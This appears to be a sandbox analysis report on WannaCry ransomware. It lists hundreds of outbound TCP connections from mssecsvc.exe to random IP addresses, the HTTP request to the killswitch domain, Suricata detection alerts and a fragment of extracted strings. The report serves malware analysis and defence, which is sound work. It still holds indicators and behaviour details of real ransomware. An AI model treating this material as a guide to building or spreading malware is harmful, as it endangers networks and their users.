64859 TCP mssecsvc.exe PID: 2368 Flag of United States United States 22.253.62.247 64860 TCP mssecsvc.exe PID: 2368 Flag of United States United States 189.95.46.12 64861 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 4.166.133.20 64862 TCP mssecsvc.exe PID: 2368 Flag of United States United States 146.13.12.228 64863 TCP mssecsvc.exe PID: 2368 Flag of United States United States 52.22.3.95 64864 TCP mssecsvc.exe PID: 2368 Flag of United States United States 194.235.199.18 64865 TCP mssecsvc.exe PID: 2368 Flag of European Union European Union 155.97.237.58 64866 TCP mssecsvc.exe PID: 2368 Flag of United States United States 83.169.213.143 64867 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 125.38.103.57 64868 TCP mssecsvc.exe PID: 2368 Flag of China China 2.153.141.92 64869 TCP mssecsvc.exe PID: 2368 Flag of Spain Spain 190.32.65.141 64870 TCP mssecsvc.exe PID: 2368 Flag of Panama Panama 102.148.59.221 64871 TCP mssecsvc.exe PID: 2368 Flag of Indonesia Indonesia 181.150.211.68 64872 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 217.16.240.205 64873 TCP mssecsvc.exe PID: 2368 Flag of Spain Spain 171.142.40.43 64874 TCP mssecsvc.exe PID: 2368 Flag of United States United States 184.59.123.30 64875 TCP mssecsvc.exe PID: 2368 Flag of United States United States 139.181.161.156 64876 TCP mssecsvc.exe PID: 2368 Flag of United States United States 103.88.102.105 64877 TCP mssecsvc.exe PID: 2368 Flag of China China 96.63.23.215 64878 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 79.175.229.128 64879 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 21.212.85.143 64880 TCP mssecsvc.exe PID: 2368 Flag of United States United States 212.236.112.169 64881 TCP mssecsvc.exe PID: 2368 Flag of Austria Austria 170.62.201.74 64882 TCP mssecsvc.exe PID: 2368 Flag of United States United States 215.103.34.198 64883 TCP mssecsvc.exe PID: 2368 Flag of United States United States 96.102.98.169 64884 TCP mssecsvc.exe PID: 2368 Flag of United States United States 67.244.148.223 64885 TCP mssecsvc.exe PID: 2368 Flag of United States United States 125.227.34.248 64886 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 208.171.176.32 64887 TCP mssecsvc.exe PID: 2368 Flag of United States United States 23.186.211.242 64888 TCP mssecsvc.exe PID: 2368 Flag of Reserved Reserved 121.54.46.147 64889 TCP mssecsvc.exe PID: 2368 Flag of Philippines Philippines 210.127.197.74 64890 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 129.19.129.190 64891 TCP mssecsvc.exe PID: 2368 Flag of United States United States 94.53.64.239 64892 TCP mssecsvc.exe PID: 2368 Flag of Romania Romania 9.95.46.151 64893 TCP mssecsvc.exe PID: 2368 Flag of United States United States 222.1.44.244 64894 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 79.39.234.51 64895 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 75.246.112.154 64896 TCP mssecsvc.exe PID: 2368 Flag of United States United States 156.94.151.39 64897 TCP mssecsvc.exe PID: 2368 Flag of United States United States 116.182.203.152 64898 TCP mssecsvc.exe PID: 2368 Flag of China China 183.95.37.29 64899 TCP mssecsvc.exe PID: 2368 Flag of China China 212.52.236.56 64900 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 131.152.3.222 64901 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 117.132.80.49 64902 TCP mssecsvc.exe PID: 2368 Flag of China China 48.144.242.184 64903 TCP mssecsvc.exe PID: 2368 Flag of United States United States 169.164.114.162 64904 TCP mssecsvc.exe PID: 2368 Flag of United States United States 114.79.39.140 64905 TCP mssecsvc.exe PID: 2368 Flag of Indonesia Indonesia 90.32.91.134 64906 TCP mssecsvc.exe PID: 2368 Flag of France France 71.26.110.81 64907 TCP mssecsvc.exe PID: 2368 Flag of United States United States 97.214.250.21 64908 TCP mssecsvc.exe PID: 2368 Flag of United States United States 189.121.228.51 64909 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 80.150.214.53 64910 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 185.10.103.173 64911 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 5.145.129.52 64912 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 174.13.247.237 64913 TCP mssecsvc.exe PID: 2368 Flag of United States United States 100.76.237.218 64914 TCP mssecsvc.exe PID: 2368 Flag of Reserved Reserved 14.52.109.132 64915 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 203.234.43.199 64916 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 20.244.97.251 64917 TCP mssecsvc.exe PID: 2368 Flag of United States United States 130.113.76.62 64918 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 180.68.219.14 64919 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 135.189.234.238 64920 TCP mssecsvc.exe PID: 2368 Flag of United States United States 84.141.186.180 64921 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 79.122.219.169 64922 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 139.154.49.175 64923 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 81.22.252.252 64924 TCP mssecsvc.exe PID: 2368 Flag of Finland Finland 116.6.212.171 64925 TCP mssecsvc.exe PID: 2368 Flag of China China 107.26.154.143 64926 TCP mssecsvc.exe PID: 2368 Flag of United States United States 192.35.246.214 64927 TCP mssecsvc.exe PID: 2368 Flag of Portugal Portugal 198.36.110.88 64928 TCP mssecsvc.exe PID: 2368 Flag of United States United States 104.14.168.124 64929 TCP mssecsvc.exe PID: 2368 Flag of United States United States 137.17.40.232 64930 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 169.124.229.130 64931 TCP mssecsvc.exe PID: 2368 Flag of United States United States 70.39.228.250 64932 TCP mssecsvc.exe PID: 2368 Flag of United States United States 212.82.24.169 64933 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 120.191.161.183 64934 TCP mssecsvc.exe PID: 2368 Flag of Indonesia Indonesia 39.113.66.95 64935 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 170.206.117.64 64936 TCP mssecsvc.exe PID: 2368 Flag of United States United States 208.153.28.23 64937 TCP mssecsvc.exe PID: 2368 Flag of United States United States 154.252.96.71 64938 TCP mssecsvc.exe PID: 2368 Flag of Algeria Algeria 209.75.237.50 64939 TCP mssecsvc.exe PID: 2368 Flag of United States United States 171.163.167.55 64940 TCP mssecsvc.exe PID: 2368 Flag of United States United States 111.43.171.152 64941 TCP mssecsvc.exe PID: 2368 Flag of China China 102.128.165.103 64942 TCP mssecsvc.exe PID: 2368 Flag of Indonesia Indonesia 130.168.210.226 64943 TCP mssecsvc.exe PID: 2368 Flag of United States United States 83.70.134.165 64944 TCP mssecsvc.exe PID: 2368 Flag of Ireland Ireland 14.236.131.203 64945 TCP mssecsvc.exe PID: 2368 Flag of Viet Nam Viet Nam 43.80.128.110 64946 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 4.220.36.150 64947 TCP mssecsvc.exe PID: 2368 Flag of United States United States 58.14.131.168 64948 TCP mssecsvc.exe PID: 2368 Flag of China China 80.97.247.142 64949 TCP mssecsvc.exe PID: 2368 Flag of Romania Romania 222.154.229.48 64950 TCP mssecsvc.exe PID: 2368 Flag of New Zealand New Zealand 129.151.217.76 64951 TCP mssecsvc.exe PID: 2368 Flag of United States United States 90.212.84.170 64952 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 161.186.146.157 64953 TCP mssecsvc.exe PID: 2368 Flag of United States United States 209.111.16.227 64954 TCP mssecsvc.exe PID: 2368 Flag of United States United States 173.138.34.224 64955 TCP mssecsvc.exe PID: 2368 Flag of United States United States 113.186.9.131 64956 TCP mssecsvc.exe PID: 2368 Flag of Viet Nam Viet Nam 49.228.203.210 64957 TCP mssecsvc.exe PID: 2368 Flag of Thailand Thailand 142.132.132.185 64958 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 208.1.70.61 64959 TCP mssecsvc.exe PID: 2368 Flag of United States United States 1.198.218.249 64960 TCP mssecsvc.exe PID: 2368 Flag of China China 174.113.194.247 64961 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 177.101.138.235 64962 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 103.206.52.46 64963 TCP mssecsvc.exe PID: 2368 Flag of India India 12.140.103.252 64964 TCP mssecsvc.exe PID: 2368 Flag of United States United States 185.150.53.205 64965 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 74.179.222.93 64967 TCP mssecsvc.exe PID: 2368 Flag of United States United States 65.99.138.107 64968 TCP mssecsvc.exe PID: 2368 Flag of Sweden Sweden 157.28.42.166 64969 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 216.24.88.54 64970 TCP mssecsvc.exe PID: 2368 Flag of United States United States 115.225.14.147 64971 TCP mssecsvc.exe PID: 2368 Flag of China China 73.171.206.38 64972 TCP mssecsvc.exe PID: 2368 Flag of United States United States 39.59.227.59 64973 TCP mssecsvc.exe PID: 2368 Flag of Pakistan Pakistan 164.167.160.116 64974 TCP mssecsvc.exe PID: 2368 Flag of United States United States 42.234.131.217 64975 TCP mssecsvc.exe PID: 2368 Flag of China China 124.232.129.215 64976 TCP mssecsvc.exe PID: 2368 Flag of China China 76.91.77.224 64977 TCP mssecsvc.exe PID: 2368 Flag of United States United States 106.98.127.94 64978 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 167.228.253.33 64979 TCP mssecsvc.exe PID: 2368 Flag of United States United States 93.11.64.38 64980 TCP mssecsvc.exe PID: 2368 Flag of France France 14.101.10.191 64981 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 44.68.75.13 64982 TCP mssecsvc.exe PID: 2368 Flag of United States United States 189.68.254.100 64983 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 135.93.171.141 64984 TCP mssecsvc.exe PID: 2368 Flag of United States United States 164.203.13.37 64985 TCP mssecsvc.exe PID: 2368 Flag of United States United States 166.75.115.86 64986 TCP mssecsvc.exe PID: 2368 Flag of Chile Chile 26.110.139.217 64988 TCP mssecsvc.exe PID: 2368 Flag of United States United States 136.52.134.39 64989 TCP mssecsvc.exe PID: 2368 Flag of United States United States 190.175.174.52 64990 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 211.7.134.112 64991 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 152.187.117.31 64992 TCP mssecsvc.exe PID: 2368 Flag of United States United States 70.145.194.161 64993 TCP mssecsvc.exe PID: 2368 Flag of United States United States 112.254.32.152 64994 TCP mssecsvc.exe PID: 2368 Flag of China China 181.208.221.10 64995 TCP mssecsvc.exe PID: 2368 Flag of Venezuela Venezuela 39.213.130.196 64996 TCP mssecsvc.exe PID: 2368 Flag of Indonesia Indonesia 122.37.43.252 64997 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 60.195.54.163 64998 TCP mssecsvc.exe PID: 2368 Flag of China China 9.187.106.209 64999 TCP mssecsvc.exe PID: 2368 Flag of United States United States 115.64.54.62 65000 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 167.66.46.87 65001 TCP mssecsvc.exe PID: 2368 Flag of United States United States 157.13.217.104 65002 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 222.58.226.131 65003 TCP mssecsvc.exe PID: 2368 Flag of China China 100.35.120.196 65004 TCP mssecsvc.exe PID: 2368 Flag of United States United States 110.147.110.221 65005 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 18.45.138.253 65006 TCP mssecsvc.exe PID: 2368 Flag of United States United States 102.145.187.100 65007 TCP mssecsvc.exe PID: 2368 Flag of Indonesia Indonesia 98.182.152.89 65008 TCP mssecsvc.exe PID: 2368 Flag of United States United States 180.232.42.129 65009 TCP mssecsvc.exe PID: 2368 Flag of Philippines Philippines 222.26.192.183 65010 TCP mssecsvc.exe PID: 2368 Flag of China China 120.190.106.48 65012 TCP mssecsvc.exe PID: 2368 Flag of Indonesia Indonesia 220.79.187.165 65013 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 77.149.69.4 65014 TCP mssecsvc.exe PID: 2368 Flag of France France 132.20.157.62 65015 TCP mssecsvc.exe PID: 2368 Flag of United States United States 139.221.204.84 65016 TCP mssecsvc.exe PID: 2368 Flag of China China 36.51.89.67 65017 TCP mssecsvc.exe PID: 2368 Flag of China China 18.222.69.93 65018 TCP mssecsvc.exe PID: 2368 Flag of United States United States 200.46.127.103 65019 TCP mssecsvc.exe PID: 2368 Flag of Panama Panama 74.37.198.221 65020 TCP mssecsvc.exe PID: 2368 Flag of United States United States 217.178.243.152 65021 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 15.61.173.16 65022 TCP mssecsvc.exe PID: 2368 Flag of United States United States 68.89.251.234 65023 TCP mssecsvc.exe PID: 2368 Flag of United States United States 156.246.76.116 65024 TCP mssecsvc.exe PID: 2368 Flag of Seychelles Seychelles 183.150.215.29 65025 TCP mssecsvc.exe PID: 2368 Flag of China China 157.111.109.177 65026 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 123.226.212.201 65027 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 126.188.156.170 65028 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 115.43.174.21 65029 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 2.199.154.61 65030 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 106.205.94.71 65031 TCP mssecsvc.exe PID: 2368 Flag of India India 218.224.148.162 65032 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 219.46.124.5 65033 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 194.113.145.76 65034 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 186.8.170.189 65035 TCP mssecsvc.exe PID: 2368 Flag of Uruguay Uruguay 93.207.74.104 65036 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 122.224.3.79 65037 TCP mssecsvc.exe PID: 2368 Flag of China China 142.199.151.115 65038 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 178.191.141.239 65039 TCP mssecsvc.exe PID: 2368 Flag of Austria Austria 119.4.180.7 65040 TCP mssecsvc.exe PID: 2368 Flag of China China 93.32.21.187 65041 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 49.85.149.221 65042 TCP mssecsvc.exe PID: 2368 Flag of China China 200.195.83.133 65043 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 53.5.149.253 65044 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 12.232.48.37 65045 TCP mssecsvc.exe PID: 2368 Flag of United States United States 49.241.133.21 65046 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 196.127.68.211 65047 TCP mssecsvc.exe PID: 2368 Flag of Morocco Morocco 193.167.91.231 65048 TCP mssecsvc.exe PID: 2368 Flag of Finland Finland 33.98.208.81 65049 TCP mssecsvc.exe PID: 2368 Flag of United States United States 176.66.206.173 65050 TCP mssecsvc.exe PID: 2368 Flag of Austria Austria 91.171.204.38 65051 TCP mssecsvc.exe PID: 2368 Flag of France France 221.234.119.126 65052 TCP mssecsvc.exe PID: 2368 Flag of China China 155.172.48.32 65053 TCP mssecsvc.exe PID: 2368 Flag of United States United States 72.75.11.30 65054 TCP mssecsvc.exe PID: 2368 Flag of United States United States 198.234.167.132 65055 TCP mssecsvc.exe PID: 2368 Flag of United States United States 80.123.254.101 65056 TCP mssecsvc.exe PID: 2368 Flag of Austria Austria 57.101.47.76 65057 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 212.251.158.39 65058 TCP mssecsvc.exe PID: 2368 Flag of Norway Norway 32.178.188.49 65059 TCP mssecsvc.exe PID: 2368 Flag of United States United States 9.29.188.210 65060 TCP mssecsvc.exe PID: 2368 Flag of United States United States 187.173.164.185 65061 TCP mssecsvc.exe PID: 2368 Flag of Mexico Mexico 109.251.75.95 65062 TCP mssecsvc.exe PID: 2368 Flag of Ukraine Ukraine 149.173.32.188 65063 TCP mssecsvc.exe PID: 2368 Flag of United States United States 209.170.84.209 65064 TCP mssecsvc.exe PID: 2368 Flag of United States United States 186.127.206.156 65065 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 152.135.144.130 65066 TCP mssecsvc.exe PID: 2368 Flag of United States United States 137.201.35.40 65067 TCP mssecsvc.exe PID: 2368 Flag of United States United States 97.234.103.65 65068 TCP mssecsvc.exe PID: 2368 Flag of United States United States 62.35.222.91 65069 TCP mssecsvc.exe PID: 2368 Flag of France France 171.165.1.199 65070 TCP mssecsvc.exe PID: 2368 Flag of United States United States 191.159.97.186 65071 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 199.73.168.73 65072 TCP mssecsvc.exe PID: 2368 Flag of United States United States 22.22.71.241 65073 TCP mssecsvc.exe PID: 2368 Flag of United States United States 72.228.118.32 65074 TCP mssecsvc.exe PID: 2368 Flag of United States United States 115.220.254.113 65075 TCP mssecsvc.exe PID: 2368 Flag of China China 107.204.78.167 65076 TCP mssecsvc.exe PID: 2368 Flag of United States United States 129.12.30.240 65077 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 46.2.173.154 65078 TCP mssecsvc.exe PID: 2368 Flag of Turkey Turkey 96.101.225.79 65079 TCP mssecsvc.exe PID: 2368 Flag of United States United States 7.121.147.230 65080 TCP mssecsvc.exe PID: 2368 Flag of United States United States 178.229.251.222 65081 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 217.107.107.202 65082 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 121.21.178.112 65083 TCP mssecsvc.exe PID: 2368 Flag of China China 207.238.35.217 65084 TCP mssecsvc.exe PID: 2368 Flag of United States United States 164.27.219.251 65085 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 53.79.118.69 65086 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 166.82.119.100 65087 TCP mssecsvc.exe PID: 2368 Flag of United States United States 197.214.135.121 65088 TCP mssecsvc.exe PID: 2368 Flag of Congo Congo 61.183.179.13 65089 TCP mssecsvc.exe PID: 2368 Flag of China China 64.160.223.167 65090 TCP mssecsvc.exe PID: 2368 Flag of United States United States 216.31.178.239 65091 TCP mssecsvc.exe PID: 2368 Flag of United States United States 147.90.147.19 65092 TCP mssecsvc.exe PID: 2368 Flag of United States United States 196.125.204.64 65093 TCP mssecsvc.exe PID: 2368 Flag of Morocco Morocco 220.178.72.209 65094 TCP mssecsvc.exe PID: 2368 Flag of China China 157.48.218.235 65095 TCP mssecsvc.exe PID: 2368 Flag of India India 86.232.2.4 65096 TCP mssecsvc.exe PID: 2368 Flag of France France 65.166.244.23 65097 TCP mssecsvc.exe PID: 2368 Flag of United States United States 136.32.150.70 65098 TCP mssecsvc.exe PID: 2368 Flag of United States United States 202.125.153.71 65099 TCP mssecsvc.exe PID: 2368 Flag of Pakistan Pakistan 160.121.226.117 65100 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 179.2.176.172 65101 TCP mssecsvc.exe PID: 2368 Flag of Chile Chile 198.79.155.117 65102 TCP mssecsvc.exe PID: 2368 Flag of United States United States 83.141.162.60 65103 TCP mssecsvc.exe PID: 2368 Flag of France France 145.249.89.123 65104 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 17.27.144.17 65105 TCP mssecsvc.exe PID: 2368 Flag of United States United States 92.75.68.113 65106 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 211.139.73.134 65107 TCP mssecsvc.exe PID: 2368 Flag of China China 218.237.9.192 65108 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 173.84.41.226 65109 TCP mssecsvc.exe PID: 2368 Flag of United States United States 78.49.209.238 65110 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 109.168.205.33 65111 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 29.104.160.181 65112 TCP mssecsvc.exe PID: 2368 Flag of United States United States 157.88.79.203 65113 TCP mssecsvc.exe PID: 2368 Flag of Spain Spain 47.221.226.226 65114 TCP mssecsvc.exe PID: 2368 Flag of United States United States 82.146.186.93 65115 TCP mssecsvc.exe PID: 2368 Flag of Lebanon Lebanon 110.43.105.184 65116 TCP mssecsvc.exe PID: 2368 Flag of China China 5.83.63.34 65117 TCP mssecsvc.exe PID: 2368 Flag of Finland Finland 65.224.238.226 65118 TCP mssecsvc.exe PID: 2368 Flag of United States United States 117.108.31.229 65119 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 48.27.195.139 65120 TCP mssecsvc.exe PID: 2368 Flag of United States United States 17.97.142.121 65121 TCP mssecsvc.exe PID: 2368 Flag of United States United States 139.36.73.99 65122 TCP mssecsvc.exe PID: 2368 Flag of United States United States 146.30.137.158 65123 TCP mssecsvc.exe PID: 2368 Flag of United States United States 178.212.126.72 65124 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 152.233.222.200 65125 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 84.35.4.161 65126 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 171.83.237.17 65128 TCP mssecsvc.exe PID: 2368 Flag of China China 91.131.162.202 65129 TCP mssecsvc.exe PID: 2368 Flag of Austria Austria 96.27.182.195 65130 TCP mssecsvc.exe PID: 2368 Flag of United States United States 53.51.166.14 65131 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 97.220.239.156 65132 TCP mssecsvc.exe PID: 2368 Flag of United States United States 34.220.222.144 65133 TCP mssecsvc.exe PID: 2368 Flag of United States United States 143.78.228.87 65134 TCP mssecsvc.exe PID: 2368 Flag of United States United States 34.109.76.122 65135 TCP mssecsvc.exe PID: 2368 Flag of United States United States 174.223.36.28 65136 TCP mssecsvc.exe PID: 2368 Flag of United States United States 72.209.125.50 65137 TCP mssecsvc.exe PID: 2368 Flag of United States United States 81.114.233.62 65138 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 38.16.136.90 65139 TCP mssecsvc.exe PID: 2368 Flag of United States United States 105.142.92.224 65140 TCP mssecsvc.exe PID: 2368 Flag of Morocco Morocco 24.249.63.70 65141 TCP mssecsvc.exe PID: 2368 Flag of United States United States 156.235.120.197 65142 TCP mssecsvc.exe PID: 2368 Flag of Seychelles Seychelles 48.87.238.178 65143 TCP mssecsvc.exe PID: 2368 Flag of United States United States 206.218.122.189 65144 TCP mssecsvc.exe PID: 2368 Flag of United States United States 59.182.49.188 65146 TCP mssecsvc.exe PID: 2368 Flag of India India 105.97.189.146 65147 TCP mssecsvc.exe PID: 2368 Flag of Algeria Algeria 20.164.48.191 65148 TCP mssecsvc.exe PID: 2368 Flag of United States United States 20.232.115.252 65149 TCP mssecsvc.exe PID: 2368 Flag of United States United States 95.83.38.144 65150 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 34.209.163.164 65151 TCP mssecsvc.exe PID: 2368 Flag of United States United States 155.36.83.225 65152 TCP mssecsvc.exe PID: 2368 Flag of United States United States 207.104.148.7 65153 TCP mssecsvc.exe PID: 2368 Flag of United States United States 129.2.230.200 65154 TCP mssecsvc.exe PID: 2368 Flag of United States United States 113.20.245.213 65155 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 66.98.145.23 65156 TCP mssecsvc.exe PID: 2368 Flag of United States United States 131.36.59.104 65157 TCP mssecsvc.exe PID: 2368 Flag of United States United States 145.150.44.144 65158 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 27.179.169.87 65159 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 214.143.39.172 65161 TCP mssecsvc.exe PID: 2368 Flag of United States United States 202.249.34.223 65162 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 15.61.92.34 65163 TCP mssecsvc.exe PID: 2368 Flag of United States United States 203.254.209.132 65164 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 220.90.94.205 65165 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 90.116.65.202 65166 TCP mssecsvc.exe PID: 2368 Flag of France France 52.252.182.157 65167 TCP mssecsvc.exe PID: 2368 Flag of United States United States 36.241.250.165 65168 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 161.253.8.214 65169 TCP mssecsvc.exe PID: 2368 Flag of United States United States Contacted Countries HTTP Traffic Endpoint Request URL Data 104.17.40.137:80 (www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com) GET / GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache 200 OK 104.17.40.137:80 (www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com) GET / GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache 200 OK Memory Forensics String Context Stream UID http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Domain/IP reference 00013504-00002368-57047-2-00408140 Suricata Alerts Event Category Description SID 104.17.40.137:80 (TCP) A Network Trojan was detected ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 2024298 104.17.40.137:80 (TCP) A Network Trojan was detected ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2 2024299 104.17.40.137:80 (TCP) A Network Trojan was detected ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4 2024301 104.17.40.137:80 (TCP) A Network Trojan was detected ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 2024298 104.17.40.137:80 (TCP) A Network Trojan was detected ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5 2024302 104.17.40.137:80 (TCP) A Network Trojan was detected WannaCry Kill-Switch Check 181710202 104.17.40.137:80 (TCP) A Network Trojan was detected ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2 2024299 104.17.40.137:80 (TCP) A Network Trojan was detected ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4 2024301 104.17.40.137:80 (TCP) A Network Trojan was detected ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5 2024302 104.17.40.137:80 (TCP) A Network Trojan was detected WannaCry Kill-Switch Check 181710202 ET rules applied using Suricata. Extracted Strings All Details: All Strings (2684) Interesting (1522) 2a8efbfadd798f6111340f7c1c956bee.dll.bin (1088) PCAP (1) TWR5WB11.txt (8) attrib.exe:2344 (3) attrib.exe:3372 (1) attrib.exe:3744 (1) icacls.exe:2672 (6) icacls.exe:2972 (1) icacls.exe:3732 (2) m_chinese (simplified).wnry (136) m_chinese (traditional).wnry (190) m_filipino.wnry (55) m_finnish.wnry (40) m_french.wnry (37) m_indonesian.wnry (35) m_polish.wnry (44) m_portuguese.wnry (189) m_romanian.wnry (97) m_russian.wnry (75) m_spanish.wnry (32) m_swedish.wnry (39) m_vietnamese.wnry (260) mssecsvc.exe (1) mssecsvc.exe:2368 (72) mssecsvc.exe:2376 (221) network.pcap (6) rundll32.exe (1) rundll32.exe:2388 (26) screen_0.png (6) tasksche.exe:2136 (5) tasksche.exe:736 (6) http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 10/68 !""#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !""#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !""#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ ((((( H ) u(}}M5 )A7u3P=h , trimite}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 .?AVtype_info@@ .rEgvWM. .rEgvWM.- /TgBhiCBjEUWKZ3cE5u2P9+4dR3jfU23tlCz/tCU8hgjapCOWZv9fexHIRiyk6zayNSHAh2iVimiE0iOxS/OuRpbpunWetUNUi99Qdn/77VgXoArmoKDc76T3E+7ZhAfuDwN3OlSK91LZOK6dIwkKmnGRK3X4xV2yO5aKv+9CVnoun6MC4OSmdKQrtN4zZnAShPGa3yLpqS3VvaD+W5IRkA9dhgJi1NlYPDhKQB2pr7GgprbLruE8xtGkqWGFtDoqzIXeXU3XV6NOsK7TlcHbBf5Al7hQA8QCIbE5g4ZfwyOEVURorlqBIt+8ILoXLDHd4XF8D8MOtDq2xGmU1IAd1PgxNHG+92GH8TnERYGX9VnUZtXsc5UYavH/ofc195afb6eDIyQMoe9TRTwtMqt/4hUf9WsgchDdcnuMO3cuT3t6WIJuf79GwRxwtyuK2VBk7hHuMISw3Q1l91m+JC21q3acLy+Sb+DXiK7216urYRdKw6rGC+Z9kGQ7zap088YFppnl+VxWphqZck/WQ 033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. 17514 (win7sp1_rtm.101119-1850) 